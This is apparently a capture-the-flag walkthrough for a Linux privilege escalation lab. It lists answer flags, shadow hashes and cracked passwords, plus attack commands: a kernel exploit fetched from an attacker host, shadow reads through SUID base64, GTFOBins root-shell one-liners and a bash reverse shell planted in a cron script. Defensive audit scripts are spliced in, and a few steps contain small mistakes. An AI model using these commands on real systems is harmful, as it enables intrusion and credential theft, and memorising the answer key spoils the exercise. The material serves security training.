

Linux Privilege Escalation

This guide contains the answers for the Linux Privilege Escalation room, together with the steps needed to reach them.

Enumeration

  1. What is the hostname of the target system?

Answer: wade7363

  2. What is the Linux kernel version of the target system?

Answer: 3.13.0-24-generic

  3. What Linux is this?

Answer: Ubuntu 14.04 LTS

  4. What version of the Python language is installed on the system?

Answer: 2.7.6

  5. What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)

Answer: CVE-2015-1328

Automated Enumeration Tools

Privilege Escalation: Kernel Exploits

  1. Find and use the appropriate kernel exploit to gain root privileges on the target system.

We first need to find the kernel version on this system with uname -a.

[Screenshot: Version]

Then we can look for an exploit for this kernel, for example through Exploit Database.

[Screenshot: Exploit]

Now we can either download the exploit file from Exploit Database or locate the copy already on our machine by its file name.

  2. What is the content of the flag1.txt file?

I will first rename the file to exploit.c.

mv 37292.c exploit.c

Then we set up a web server on our machine to deliver the file.

python3 -m http.server 8080

In the temp folder on the target we can download the exploit.

wget 10.18.78.136:8080/exploit.c

[Screenshot: Prepare]

Now we should compile the file.

gcc exploit.c -o exploit

[Screenshot: Success]

Lastly, we need to search for the flag and read it!

find / -name flag1.txt 2>/dev/null

cat /home/matt/flag1.txt

[Screenshot: Flag]

Answer: THM-28392872729920

Privilege Escalation: Sudo

  1. How many programs can the user "karen" run on the target system with sudo rights?

We can find that out with sudo -l.

[Screenshot: Permissions]

Answer: 3
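The count above is read off a screenshot of sudo -l. For an audit across many users it helps to turn that listing into an explicit inventory. The script below is an added example, not part of the original write-up: the function name list_sudo_commands and the sample listing are constructed here, and it assumes the standard sudoers output format (a "may run the following commands" header followed by "(runas) [NOPASSWD:] cmd, cmd" lines, with only the NOPASSWD:/PASSWD: tags handled).

```shell
#!/bin/sh
# Added example (not from the original write-up): turn saved `sudo -l` output
# into one command per line and return how many commands were found.
# Assumed format of the listing:
#     User karen may run the following commands on host:
#         (ALL) NOPASSWD: /usr/bin/find, /usr/bin/less
# Only the NOPASSWD:/PASSWD: tags are stripped; any other tag stays in place.

# list_sudo_commands <file-with-sudo-l-output>
# Prints each command and returns the number of commands (0 if none).
list_sudo_commands() {
    listing=$1
    in_rules=0
    n=0
    while read -r line; do
        case "$line" in
            *"may run the following commands"*) in_rules=1; continue ;;
        esac
        [ "$in_rules" -eq 1 ] || continue      # ignore "Matching Defaults" etc.
        [ -n "$line" ] || continue
        # Strip the "(runas)" prefix and an optional password tag
        rule=${line#*\) }
        rule=${rule#NOPASSWD: }
        rule=${rule#PASSWD: }
        # What remains is a comma separated command list
        old_ifs=$IFS
        IFS=,
        for cmd in $rule; do
            cmd=${cmd# }                        # drop the space after each comma
            printf '%s\n' "$cmd"
            n=$((n + 1))
        done
        IFS=$old_ifs
    done < "$listing"
    return "$n"
}

# Constructed sample (not the room's real output) so the script runs offline.
build_sample_listing() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Matching Defaults entries for karen on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User karen may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/find, /usr/bin/less
    (root) /usr/bin/nmap
EOF
    printf '%s\n' "$f"
}

sample=$(build_sample_listing)
n=0
list_sudo_commands "$sample" || n=$?
echo "$n sudo-able commands found in the constructed sample"
# To audit the live account instead:  sudo -l > listing.txt; list_sudo_commands listing.txt
```

The return value doubles as the count, so a caller that needs the number should capture it with `list_sudo_commands file || n=$?` rather than treating non-zero as an error.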

  2. What is the content of the flag2.txt file?

We first locate the flag with:

find / -name flag2.txt 2>/dev/null

[Screenshot: Location]

To read the flag we can use either less or nano with sudo.

sudo less /home/ubuntu/flag2.txt

sudo nano /home/ubuntu/flag2.txt

[Screenshot: Flag]

P.S. It turned out permissions weren't even needed to read the flag.

Answer: THM-402028394

  3. How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

This can be found on the GTFOBins website by searching for nmap.

Answer: sudo nmap --interactive

  4. What is the hash of frank's password?

To do this we use the sudo rights on nano to read the shadow file.

sudo nano /etc/shadow

[Screenshot: Hashes]

Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1

Privilege Escalation: SUID

  1. Which user shares the name of a great comic book writer?

This we can find in the passwd file, which can be read without any special permissions, so any method of reading it will do.

[Screenshot: Writer]

Copy its contents to a file (passwd.txt), as we will need it for unshadow later.

Answer: gerryconway

  2. What is the password of user2?

First we need to find which binary with a set SUID bit we can use.

find / -type f -perm -4000 2>/dev/null

[Screenshot: Bin]

Looks like we can use base64. Let's use it to copy the contents of the shadow file.

/usr/bin/base64 "/etc/shadow" | base64 --decode

[Screenshot: Shadow]

With the output saved as shadow.txt, we join the two files with unshadow.

unshadow passwd.txt shadow.txt > passwords.txt

Finally, we use john to crack the password.

john passwords.txt --wordlist=/usr/share/wordlists/rockyou.txt

[Screenshot: Passwords]

Answer: Password1

  3. What is the content of the flag3.txt file?

We can use the same method as before, but with a different file. Searching for the flag gives us its location.

find / -name flag3.txt 2>/dev/null
/home/ubuntu/flag3.txt

/usr/bin/base64 "/home/ubuntu/flag3.txt" | base64 --decode

[Screenshot: Flag]

Answer: THM-3847834

Privilege Escalation: Capabilities

  1. How many binaries have set capabilities?

Using getcap -r we can see which binaries have capabilities set.

getcap -r / 2>/dev/null

[Screenshot: Capabilities set]

Answer: 6

  2. What other binary can be used through its capabilities?

Comparing the binaries from the previous list against GTFOBins gives us the answer.

[Screenshot: Set]

Answer: view

  3. What is the content of the flag4.txt file?

First we look for the flag using:

find /home -name flag4.txt 2>/dev/null

Apparently, we can read the file without root access.

[Screenshot: Flag]

Let's try to escalate our privileges anyway using the view binary. For this to work we need to use the path we identified in the first screenshot (the getcap output). Then use the following command:

/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

This gives us a root shell that we can leverage.

[Screenshot: Root]

Answer: THM-9349843

Privilege Escalation: Cron Jobs

  1. How many user-defined cron jobs can you see on the target system?

Using the following command we can list the cron jobs defined in the system crontab:

cat /etc/crontab

[Screenshot: Tab]

Answer: 4

  2. What is the content of the flag5.txt file?

We have found a script we can alter (backup.sh). Let's add a simple TCP reverse shell in bash, taken from PayloadsAllTheThings.

bash -i >& /dev/tcp/10.18.78.136/1337 0>&1

[Screenshot: Script]

As the shell didn't work at first, I had to check its permissions with ls -lh. This showed the file wasn't executable.

[Screenshot: Permissions]

Using chmod +x backup.sh fixes this.

Now we set up a listener on our machine and wait.

nc -nlvp 1337

Once the connection is made, we can look for the flag.

[Screenshot: Flag]

Answer: THM-383000283
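The whole flag5 path hinges on one thing: a root cron job runs a script that a low-privileged user is allowed to edit. A defender can check for exactly that condition. The script below is an added example and not part of the original write-up: the function names check_cron_scripts and build_sample_crontab are made up here, the crontab it audits is a constructed sample (not the room's real /etc/crontab), and it assumes GNU stat and five-field system-crontab lines (minute hour dom month dow user command).

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a crontab in
# /etc/crontab format and flag every job whose script a non-root user could
# modify, or which does not exist at all (someone who can write its directory
# could create it). Assumes five-field schedules and GNU stat.

# check_cron_scripts <crontab-file>
# Prints WRITABLE / MISSING / OK per job; returns 1 if anything was flagged.
check_cron_scripts() {
    crontab_file=$1
    bad=0
    while read -r m h dom mon dow user cmd; do
        # Skip blank lines, comments and variable assignments such as PATH=...
        case "$m" in ''|\#*|*=*) continue ;; esac
        script=${cmd%% *}                               # first word of the command field
        case "$script" in /*) ;; *) continue ;; esac    # only absolute paths are checked
        if [ ! -e "$script" ]; then
            printf 'MISSING %s (run as %s)\n' "$script" "$user"
            bad=1
            continue
        fi
        mode=$(stat -c '%a' "$script")                  # octal permission bits
        if [ $(( 0$mode & 022 )) -ne 0 ]; then          # group (020) or other (002) write bit
            printf 'WRITABLE %s (mode %s, run as %s)\n' "$script" "$mode" "$user"
            bad=1
        else
            printf 'OK %s (mode %s, run as %s)\n' "$script" "$mode" "$user"
        fi
    done < "$crontab_file"
    return "$bad"
}

# Constructed sample: two scripts with different permissions plus one that is
# referenced but missing. Prints the path of the generated crontab.
build_sample_crontab() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho backup\n' > "$dir/backup.sh"
    chmod 777 "$dir/backup.sh"      # constructed: world-writable, the weakness used above
    printf '#!/bin/sh\necho rotate\n' > "$dir/rotate.sh"
    chmod 755 "$dir/rotate.sh"      # constructed: only the owner can modify it
    cat > "$dir/crontab" <<EOF
# constructed sample in /etc/crontab format
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/1 * * * * root $dir/backup.sh
0 3 * * * root $dir/rotate.sh --weekly
30 4 * * * root $dir/missing.sh
EOF
    printf '%s\n' "$dir/crontab"
}

sample=$(build_sample_crontab)
if check_cron_scripts "$sample"; then
    echo "No risky cron scripts in the constructed sample"
else
    echo "Finding: a root cron job runs a script that non-root users can modify or create"
fi
# To audit the live system instead:  check_cron_scripts /etc/crontab
```

The same function can be pointed at the files under /etc/cron.d, which use the same seven-field format; per-user crontabs omit the user field and would need the read line adjusted.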

  3. What is Matt's password?

To do this we need his password hash, which we get by viewing the shadow file from our root shell.

cat /etc/shadow | grep "matt"

[Screenshot: Hash]

Now we can plug this into John the Ripper to crack the password itself (using sha512crypt as the format).

john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt matpass.hash

[Screenshot: Password]

Answer: 123456

Privilege Escalation: PATH

  1. What is the odd folder you have write access for?

To find all writable folders we can use the following command. Keeping two path components also shows subfolders, which matches the form of the answer.

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u

Answer: /home/murdoch

Exploit the $PATH vulnerability to read the content of the flag6.txt file.

  2. What is the content of the flag6.txt file?

Let's check where the flag file is located.

find / -name flag6* 2>/dev/null

/home/matt/flag6.txt

We found the test file in Murdoch's home folder, so we need to add that folder to the PATH variable and create a thm file containing a command to read the flag.

export PATH=/home/murdoch:$PATH

echo "cat /home/matt/flag6.txt" > thm

[Screenshot: Path Prep]

Now we must make the file executable and run the test file.

chmod +x thm

./test

[Screenshot: Path Flag]

Answer: THM-736628929
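The flag6 steps work because a directory that an ordinary user controls ends up in PATH, so a file named thm placed there is found before any real program. The check below is an added example, not from the original write-up: writable_path_dirs and build_sample_path are names invented here, the directories are constructed with mktemp, and GNU stat is assumed. It goes slightly beyond the room's case by also flagging PATH entries that do not exist and empty entries (which mean the current directory), since both let someone plant a file with a command's name.

```shell
#!/bin/sh
# Added example (not from the original write-up): report PATH entries that an
# unprivileged user could write to, that are missing, or that are empty
# (an empty element makes the shell search the current directory).

# writable_path_dirs <PATH-string>
# Prints WRITABLE / MISSING / RELATIVE lines; returns the number of such entries.
writable_path_dirs() {
    rest="$1:"               # trailing sentinel so the last element is handled like the others
    found=0
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        if [ -z "$dir" ]; then
            printf 'RELATIVE (empty element: current directory is searched)\n'
            found=$((found + 1))
            continue
        fi
        if [ ! -d "$dir" ]; then
            printf 'MISSING %s\n' "$dir"
            found=$((found + 1))
            continue
        fi
        mode=$(stat -c '%a' "$dir")              # octal permission bits (GNU stat)
        if [ $(( 0$mode & 022 )) -ne 0 ]; then   # group or world write bit set
            printf 'WRITABLE %s (mode %s)\n' "$dir" "$mode"
            found=$((found + 1))
        fi
    done
    return "$found"
}

# Constructed sample: a normal directory, a world-writable one and a missing one.
# Prints the PATH string to audit.
build_sample_path() {
    base=$(mktemp -d)
    mkdir "$base/trusted_bin" "$base/shared_bin"
    chmod 755 "$base/trusted_bin"   # constructed: like a system bin directory
    chmod 777 "$base/shared_bin"    # constructed: like a user-writable folder added to PATH
    printf '%s\n' "$base/shared_bin:$base/trusted_bin:$base/gone"
}

sample=$(build_sample_path)
n=0
writable_path_dirs "$sample" || n=$?
echo "$n risky PATH entries in the constructed sample"
# To audit the live environment instead:  writable_path_dirs "$PATH"
```

Running this against the PATH of a service account, or against the secure_path that sudo uses, is the quickest way to confirm that no entry is writable by anyone but root.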

Privilege Escalation: NFS

  1. How many mountable shares can you identify on the target system?

showmount -e 10.10.6.120

[Screenshot: NFS Shares]

Answer: 3

  2. How many shares have the "no_root_squash" option enabled?

cat /etc/exports

[Screenshot: NFS Squash]

Answer: 3
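Counting no_root_squash shares by eye works for three lines; on a real fileserver you want the exports file parsed. The script below is an added example, not part of the original write-up: report_no_root_squash and build_sample_exports are names chosen here, the exports file is a constructed sample (the room's real /etc/exports is only shown as a screenshot), and it assumes the usual "/path client(options) client(options)" syntax with comments starting at #.

```shell
#!/bin/sh
# Added example (not from the original write-up): parse a file in /etc/exports
# format and report every share exported with no_root_squash, the option that
# lets a remote root user keep root ownership on files created in the share.

# report_no_root_squash <exports-file>
# Prints one RISK line per affected client entry; returns the number of
# affected shares (a share with several risky clients counts once).
report_no_root_squash() {
    exports_file=$1
    count=0
    while read -r line; do
        line=${line%%#*}                 # strip comments
        set -f                           # "*" is an NFS client wildcard, not a glob
        set -- $line                     # split into path and client(option) entries
        set +f
        [ $# -ge 2 ] || continue         # blank line, or a path with no clients
        share=$1
        shift
        flagged=0
        for entry in "$@"; do
            case "$entry" in
                *no_root_squash*)        # root_squash alone does not match this pattern
                    printf 'RISK %s exported to %s\n' "$share" "$entry"
                    flagged=1 ;;
            esac
        done
        if [ "$flagged" -eq 1 ]; then count=$((count + 1)); fi
    done < "$exports_file"
    return "$count"
}

# Constructed sample: two risky shares (one only for a single client), one safe
# share and one commented-out line. Prints the path of the generated file.
build_sample_exports() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample in /etc/exports format
/srv/nfs/backups   *(rw,sync,no_root_squash)
/srv/nfs/tmp       10.0.0.0/24(rw,sync,root_squash) 10.0.1.5(rw,sync,no_root_squash)
/srv/nfs/public    *(ro,sync,root_squash)
# /srv/nfs/old     *(rw,no_root_squash)
EOF
    printf '%s\n' "$f"
}

sample=$(build_sample_exports)
n=0
report_no_root_squash "$sample" || n=$?
echo "$n share(s) exported with no_root_squash in the constructed sample"
# To audit the live server instead:  report_no_root_squash /etc/exports
```

Any share this reports should be re-exported with root_squash (the default) unless there is a documented reason for the exception, since no_root_squash combined with a world-writable export is the setup the next task relies on.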

Gain a root shell on the target system

  3. What is the content of the flag7.txt file?

For this we will mount the /tmp folder to our system and add a binary that will give us root access.

mkdir /tmp/sharedtmpfolder
mount -o rw 10.10.253.205:/tmp /tmp/sharedtmpfolder

vi nfs.c
chmod +x
gcc nfs.c -o nfs -w

[Screenshot: NFS Script]

Unfortunately, I would get error messages when trying to compile the file. In the end this just didn't seem to work on my system.

Answer: (not obtained)

Capstone Challenge

  1. What is the content of the flag1.txt file?

The first thing to do is to locate the flags. Unfortunately, the search didn't reveal anything, probably because our account is not allowed to look into other users' folders.

find / -name flag* 2>/dev/null

After enumerating multiple entry vectors, the SUID method seems to work. Using the following command we see that base64 has the SUID bit set, which lets us read files we aren't allowed to.

find / -type f -perm -4000 2>/dev/null

[Screenshot: Suid]

Using GTFOBins, we can see how we can read such files.

[Screenshot: Suid Gtfo]

Unfortunately, we don't know the location of the flags yet, but we can try and read the shadow file.

/usr/bin/base64 "/etc/shadow" | base64 --decode

[Screenshot: Shadow]

Cracking missy's hash with John gives us her password (unfortunately we couldn't crack root's password).

john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt missyhash.hash

Results -> Password1

After switching to missy's account using su missy, we can look for the flags again. Looks like there is one located at /home/missy/Documents/flag1.txt.

This flag we can actually read now.

[Screenshot: Flag1]

Answer: THM-42828719920544

  2. What is the content of the flag2.txt file?

The second flag is probably located in /home/rootflag, so we will probably need root access for this one.

After searching for a long time, I couldn't find anything. But then I re-checked missy to see if she could run anything with sudo.

sudo -l

Apparently, she can use find with sudo. We can use the following command to find the second flag:

sudo find /home -name flag* 2>/dev/null

[Screenshot: Flag Location]

We can now either use the same base64 exploit to read the flag or we can escalate our privileges to root with the find binary.

/usr/bin/base64 "/home/rootflag/flag2.txt" | base64 --decode

[Screenshot: Flag2 Base]

Or:

sudo find . -exec /bin/sh \; -quit

cat /home/rootflag/flag2.txt

[Screenshot: Flag2 Root]

Answer: THM-168824782390238